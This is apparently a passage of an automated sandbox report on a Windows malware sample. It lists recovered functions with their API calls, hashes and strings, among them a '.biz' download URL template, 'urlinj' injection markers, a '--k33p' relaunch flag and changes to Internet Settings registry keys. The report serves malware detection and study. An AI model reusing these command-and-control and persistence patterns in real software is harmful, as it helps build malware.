                                                                                                                                                                                                              • String ID: T2A
                                                                                                                                                                                                              • API String ID: 1083639309-2019523081
                                                                                                                                                                                                              • Opcode ID: a717315559cf9e37052940ac4f720aa2865e6750b4b3c22cba3fac3a866db69e
                                                                                                                                                                                                              • Instruction ID: 7c6136f779b091b801ec7ced044d4ecd4f532b5644714f746006db05a6c2f320
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a717315559cf9e37052940ac4f720aa2865e6750b4b3c22cba3fac3a866db69e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 627108706482009BE710AB24DD41B9B3BB8AB45348F04453AF945E72E1F37CE669CB9A
                                                                                                                                                                                                              Function 00402818 Relevance: 142.7, APIs: 64, Strings: 17, Instructions: 961networkregistrystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegCreateKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00000000,00000000,000F003F,0040F4FC,?,00000000,?,004047F1,00000000,?,?,?,qnd_b__-13), ref: 0040284E
                                                                                                                                                                                                              • RegCreateKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00000000,00000000,000F003F,0040F4FC,?,00000000,?,?,?,0040F4FC,?,00000000), ref: 0040288A
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,Default Flags,00000000,00000000,00412170,?,?,?,?,?,00000000,?,?,?,0040F4FC,?), ref: 004028BF
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,Default Flags,00000000,00000000,00412170,?,?,?,0040F4FC,?,00000000,?,?,?,0040F4FC,?), ref: 004028ED
                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(00412170,?,?,?,?,?,?,?,0040F4FC,?,00000000,?,?,?,0040F4FC,?), ref: 0040290B
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412170,00000012), ref: 00402944
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412170,00000012), ref: 00402965
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,0040F4FC,?,00000000,?,?,?,0040F4FC,?,00000000), ref: 004029F2
                                                                                                                                                                                                              • gethostbyname.WS2_32(?), ref: 00402A11
                                                                                                                                                                                                                • Part of subcall function 0040140F: wsprintfA.USER32 ref: 00401422
                                                                                                                                                                                                              • htons.WS2_32(00000050), ref: 00402A30
                                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000006), ref: 00402A5B
                                                                                                                                                                                                              • closesocket.WS2_32(00000000), ref: 00402A84
                                                                                                                                                                                                              • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Win32),00000004,00000000,00000000,00000000), ref: 00402AC6
                                                                                                                                                                                                              • InternetSetOptionA.WININET(00000000,00000002,00009C40,00000004), ref: 00402AEF
                                                                                                                                                                                                              • InternetSetOptionA.WININET(00000000,00000006,00009C40,00000004), ref: 00402AFB
                                                                                                                                                                                                              • InternetSetOptionA.WININET(00000000,00000005,00009C40,00000004), ref: 00402B07
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00402B23
                                                                                                                                                                                                              • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,84280300,00000000), ref: 00402B38
                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00402B5B
                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00402B62
                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00402B71
                                                                                                                                                                                                              • GetIpAddrTable.IPHLPAPI(00000000,?,00000000), ref: 00402BA0
                                                                                                                                                                                                              • GetIpAddrTable.IPHLPAPI(?,?,00000000), ref: 00402BDB
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00402C22
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00402C31
                                                                                                                                                                                                              • Sleep.KERNEL32(000927C0,?,?,?,?,?,?,?,?,?,?,?,0040F4FC,?,00000000), ref: 00403A0C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.3817436842.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817400178.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817514137.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817575956.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817611138.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Internet$Value$CloseHandleOptionwsprintf$AddrCreateOpenQueryTableTime$FileSleepSystemclosesocketgethostbynamehtonslstrcpylstrlensocket
                                                                                                                                                                                                              • String ID: %02X$%u.%u.%u.%s$Default Flags$Mozilla/4.0 (compatible; MSIE 6.0; Win32)$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced$Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy$g00d d0gg$http://%s.biz/d/N?$http://%s/$isdn$modem$tmp$urlinj_conn$urlinj_creat$urlinj_creat_f$urlinj_fork$urlinj_xfer
                                                                                                                                                                                                              • API String ID: 3505441413-516498188
                                                                                                                                                                                                              • Opcode ID: fa267d9628a9f114b215f19b79ba989e1f48ff1e7bee2068e6546ad8a35e66b0
                                                                                                                                                                                                              • Instruction ID: 361da06dea62f3c206a16b96f36873db8e41f07557a8891ad4d22fd480433f73
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fa267d9628a9f114b215f19b79ba989e1f48ff1e7bee2068e6546ad8a35e66b0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D8721B70A002045BDB20EF34CD4ABDA7B75AB40305F1441B6F909B62C6E7BD9A98CF5E
                                                                                                                                                                                                              Function 0040355D Relevance: 39.0, APIs: 18, Strings: 4, Instructions: 493networkregistrysleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,0040F4FC,?,00000000,?,?,?,0040F4FC,?,00000000), ref: 004029F2
                                                                                                                                                                                                              • gethostbyname.WS2_32(?), ref: 00402A11
                                                                                                                                                                                                              • htons.WS2_32(00000050), ref: 00402A30
                                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000006), ref: 00402A5B
                                                                                                                                                                                                              • closesocket.WS2_32(00000000), ref: 00402A84
                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00403920
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412170,00000012), ref: 004039CD
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412170,00000012), ref: 004039EE
                                                                                                                                                                                                              • Sleep.KERNEL32(000927C0,?,?,?,?,?,?,?,?,?,?,?,0040F4FC,?,00000000), ref: 00403A0C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.3817436842.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817400178.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817514137.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817575956.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817611138.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: TimeValue$FileSleepSystemclosesocketgethostbynamehtonslstrcpysocket
                                                                                                                                                                                                              • String ID: %u.%u.%u.%s$Default Flags$isdn$modem
                                                                                                                                                                                                              • API String ID: 1870287861-1479823086
                                                                                                                                                                                                              • Opcode ID: efdf5ecac0f8b2257d64c741ce4c89ff429d26f15e51e12c4a55832d2e3adf3a
                                                                                                                                                                                                              • Instruction ID: 2ee653d2f7df55df6907a0a9b2e57412953aa95c4ecf6cadf6b3b4d2485eddb3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: efdf5ecac0f8b2257d64c741ce4c89ff429d26f15e51e12c4a55832d2e3adf3a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E412D3B0A002149FDB20EF28CD45B997BB5AF45304F1482FAE808B73D1D7799A85CF59
                                                                                                                                                                                                              Function 004038AA Relevance: 37.1, APIs: 17, Strings: 4, Instructions: 306networksleepregistryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,0040F4FC,?,00000000,?,?,?,0040F4FC,?,00000000), ref: 004029F2
                                                                                                                                                                                                              • gethostbyname.WS2_32(?), ref: 00402A11
                                                                                                                                                                                                              • htons.WS2_32(00000050), ref: 00402A30
                                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000006), ref: 00402A5B
                                                                                                                                                                                                              • closesocket.WS2_32(00000000), ref: 00402A84
                                                                                                                                                                                                              • Sleep.KERNEL32(00000000), ref: 004038FD
                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00403920
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412170,00000012), ref: 004039CD
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412170,00000012), ref: 004039EE
                                                                                                                                                                                                              • Sleep.KERNEL32(000927C0,?,?,?,?,?,?,?,?,?,?,?,0040F4FC,?,00000000), ref: 00403A0C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.3817436842.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817400178.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817514137.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817575956.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817611138.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: SleepTimeValue$FileSystemclosesocketgethostbynamehtonslstrcpysocket
                                                                                                                                                                                                              • String ID: %u.%u.%u.%s$Default Flags$isdn$modem
                                                                                                                                                                                                              • API String ID: 104937078-1479823086
                                                                                                                                                                                                              • Opcode ID: 2833a2524eb25981238785abb9cd29ebbfb093e0f0dba8da85f1f35722d8a34b
                                                                                                                                                                                                              • Instruction ID: 51207a69c6f84e7cd26efe5e5962b9edc78a43a6ad57510283d07de6baf8f7fe
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2833a2524eb25981238785abb9cd29ebbfb093e0f0dba8da85f1f35722d8a34b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94C12C71A002149BDB20DF38CD49BD977B5AF44304F1082B6E509F72D1E7B99A58CF5A
                                                                                                                                                                                                              Function 00402030 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 234networkstringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,?), ref: 00402065
                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000,?), ref: 0040206E
                                                                                                                                                                                                              • htons.WS2_32(00000000), ref: 004020C9
                                                                                                                                                                                                              • inet_addr.WS2_32(?), ref: 004020F0
                                                                                                                                                                                                              • gethostbyname.WS2_32(?), ref: 00402107
                                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000006), ref: 0040213E
                                                                                                                                                                                                              • closesocket.WS2_32(00000000), ref: 00402169
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 004021B5
                                                                                                                                                                                                              • send.WS2_32(00000000,?,00000000,00000000), ref: 004021C5
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,HTTP/1.0 200), ref: 00402206
                                                                                                                                                                                                              • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Win32),00000004,00000000,00000000,00000000), ref: 0040229C
                                                                                                                                                                                                              • InternetSetOptionA.WININET(00000000,00000002,00009C40,00000004), ref: 004022BF
                                                                                                                                                                                                              • InternetSetOptionA.WININET(00000000,00000006,00009C40,00000004), ref: 004022CB
                                                                                                                                                                                                              • InternetSetOptionA.WININET(00000000,00000005,00009C40,00000004), ref: 004022D7
                                                                                                                                                                                                              • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,84280300,00000000), ref: 004022F2
                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00402336
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • 0, xrefs: 004021EF
                                                                                                                                                                                                              • GET /%s HTTP/1.0Host: %s:%uUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0), xrefs: 00402183
                                                                                                                                                                                                              • Mozilla/4.0 (compatible; MSIE 6.0; Win32), xrefs: 00402297
                                                                                                                                                                                                              • GET /%s HTTP/1.0Host: %sUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0), xrefs: 0040217C
                                                                                                                                                                                                              • HTTP/1.0 200, xrefs: 00402200
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.3817436842.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817400178.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817514137.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817575956.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817611138.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Internet$Option$Open$CloseHandleclosesocketgethostbynamehtonsinet_addrlstrcmpilstrcpylstrlensendsocketwsprintf
                                                                                                                                                                                                              • String ID: 0$GET /%s HTTP/1.0Host: %sUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)$GET /%s HTTP/1.0Host: %s:%uUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)$HTTP/1.0 200$Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                              • API String ID: 326340279-182194581
                                                                                                                                                                                                              • Opcode ID: 533dbdeed170df75c78b0b1e818a75e2cb4ab2a794039f37daf654ed5ccfbbf1
                                                                                                                                                                                                              • Instruction ID: 67f1582d9d65064009b7b38dedaf8d45dcb20af8a74f6ab8ff9eb660a5d02e62
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 533dbdeed170df75c78b0b1e818a75e2cb4ab2a794039f37daf654ed5ccfbbf1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83810DB0E002045BD710AB749E49B5F76B8AB05314F0441B6EB05FB2D1E7FC9A59C79E
                                                                                                                                                                                                              Function 00401439 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 70registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F,?,?,?,?,?,?,?,?,?,004053DB), ref: 00401455
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,ShellRegEx,00000000,?,?,?,?,?,?,0002001F,?), ref: 00401482
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,0002001F,?), ref: 0040149E
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F,?,?,?,?,?,0002001F,?), ref: 004014BF
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,ShellRegEx,00000000,?,?,?,?,?,?,0002001F,?,?,?,?,?,0002001F), ref: 004014F3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.3817436842.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817400178.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817514137.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817575956.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817611138.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: OpenQueryValue$Close
                                                                                                                                                                                                              • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced$ShellRegEx
                                                                                                                                                                                                              • API String ID: 2529929805-3421572904
                                                                                                                                                                                                              • Opcode ID: cd487fd942f41903dd11e311c50e255b77b217701e9477cf7c32f2f6e31c553d
                                                                                                                                                                                                              • Instruction ID: 4b3f21838edb9e41f667f6993cf98c5a1242fec43926aa3cdaef8ebd8d2009fd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd487fd942f41903dd11e311c50e255b77b217701e9477cf7c32f2f6e31c553d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C1187B2904300B7E700AA61AD46F2777ACBB8470DF11083EFD45B51D2F279DA288767
                                                                                                                                                                                                              Function 00401379 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 51processfilesynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetStartupInfoA.KERNEL32(?), ref: 00401393
                                                                                                                                                                                                              • CreateProcessA.KERNEL32(?,--k33p,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004013AF
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,?,--k33p,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004013C9
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00000000,?,?), ref: 004013D9
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 004013ED
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,?), ref: 004013FC
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000,?,?), ref: 00401405
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.3817436842.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817400178.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817514137.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817575956.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817611138.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandle$Create$FileInfoObjectProcessSingleStartupWait
                                                                                                                                                                                                              • String ID: --k33p
                                                                                                                                                                                                              • API String ID: 881816827-1573217081
                                                                                                                                                                                                              • Opcode ID: cba08d0e4e45f01dd6ace973ea33b7b63a207b7531e35ce1b4a5f54abbb5a40a
                                                                                                                                                                                                              • Instruction ID: 3f95ffb7ecc753adf67741720bf5132c3bbf7ea7650a4e902ed5c82167082f99
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cba08d0e4e45f01dd6ace973ea33b7b63a207b7531e35ce1b4a5f54abbb5a40a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C01813180420476D6213A36AC07F0F7FA89B4576CF210A3DF959351EAE67D663D42AF
                                                                                                                                                                                                              Function 00401D76 Relevance: 12.1, APIs: 8, Instructions: 94networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00401D9F
                                                                                                                                                                                                              • connect.WS2_32(00000000,?,00000010), ref: 00401DB3
                                                                                                                                                                                                              • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00401DC9
                                                                                                                                                                                                              • WSAGetLastError.WS2_32 ref: 00401DDB
                                                                                                                                                                                                              • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 00401DF8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.3817436842.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817400178.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817514137.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817575956.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817611138.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ioctlsocket$ErrorLastconnect
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1886816560-0
                                                                                                                                                                                                              • Opcode ID: 9e80b3ac6c6475ff1c6574f67f9f1b28db439d7aba4eb792491afc0fea029df5
                                                                                                                                                                                                              • Instruction ID: 443f35bcad443bf4521d197b8b602cf4c8bc99f5fac3635e2f32846607df0921
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e80b3ac6c6475ff1c6574f67f9f1b28db439d7aba4eb792491afc0fea029df5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E53191B15042005AE230AA65DD45FDF76EC9B8531CF00073EF999A62D1E678A62982EB
                                                                                                                                                                                                              Function 00401912 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 55registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,?,?,00405EB0), ref: 0040193D
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00401953
                                                                                                                                                                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000300), ref: 0040197D
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,00000300,?,?,?,?,?,00020019,?,?,?,00405EB0), ref: 0040198D
                                                                                                                                                                                                              • RegDeleteKeyA.ADVAPI32(?), ref: 0040199A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.3817436842.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817400178.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817514137.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817575956.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817611138.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseDeleteEnumOpenwsprintf
                                                                                                                                                                                                              • String ID: %s\%s
                                                                                                                                                                                                              • API String ID: 4202809218-4073750446
                                                                                                                                                                                                              • Opcode ID: a562f05e9694ffb380f4cfc04b5ada440270478fadf66736622ea1f08fb25b1f
                                                                                                                                                                                                              • Instruction ID: 17f0bcb135b28bc178a216f8b2dfa9435dc5451e8c8b02a629b5be3cc13ba035
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a562f05e9694ffb380f4cfc04b5ada440270478fadf66736622ea1f08fb25b1f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C601ACB2A042047BE52075266D03F9B76ECCBC574CF11007AF909B61D1E5799F2981BF
                                                                                                                                                                                                              Function 00401EC9 Relevance: 7.6, APIs: 5, Instructions: 113networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • select.WS2_32(00000000,?,00000000,00000000,?), ref: 00401F45
                                                                                                                                                                                                              • recv.WS2_32(00000000,?,?,00000002), ref: 00401F5E
                                                                                                                                                                                                              • recv.WS2_32(00000000,?,00000001,00000000), ref: 00401F7E
                                                                                                                                                                                                              • recv.WS2_32(00000000,?,-00000001,00000000), ref: 00401FB4
                                                                                                                                                                                                              • recv.WS2_32(00000000,?,00000000,00000000), ref: 00401FC6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.3817436842.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817400178.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817514137.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817575956.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817611138.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: recv$select
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 873784944-0
                                                                                                                                                                                                              • Opcode ID: 331c4b56a962cc5ab22ade2b3a75bc455250cfa2f4922ab3eade63a1b2494d84
                                                                                                                                                                                                              • Instruction ID: c66e6617afff8c9d9109827ab4c11b99613a78ce40c43f432ca9f356368ad492
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 331c4b56a962cc5ab22ade2b3a75bc455250cfa2f4922ab3eade63a1b2494d84
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0A31097040C3429BD731DE14C984B6BBAD8EB81358F24453FF589A62D1E3BD8445D7A7
                                                                                                                                                                                                              Function 0040263A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123filenetworkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • InternetReadFile.WININET(?,00000000,00000100,?), ref: 0040265C
                                                                                                                                                                                                              • select.WS2_32(00000000,?,00000000,00000000,?), ref: 004026B1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.3817436842.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817400178.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817514137.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817575956.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817611138.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileInternetReadselect
                                                                                                                                                                                                              • String ID: (
                                                                                                                                                                                                              • API String ID: 1501673908-3887548279
                                                                                                                                                                                                              • Opcode ID: 90583d2b313c707988cabef44d03dce10f4e52a7c9587c3868e69efa36d07d23
                                                                                                                                                                                                              • Instruction ID: 6522e2537fb8c8e721883018bf3c6a7a4605c561a93ab5d2b210f47b7f02e7dc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 90583d2b313c707988cabef44d03dce10f4e52a7c9587c3868e69efa36d07d23
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 094172341083859BD3318F24C588BEBFBE4EB89314F24492FD8D9972C2D3B99865CB56
                                                                                                                                                                                                              Function 00401D38 Relevance: 4.5, APIs: 3, Instructions: 21networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 00401D49
                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00401D51
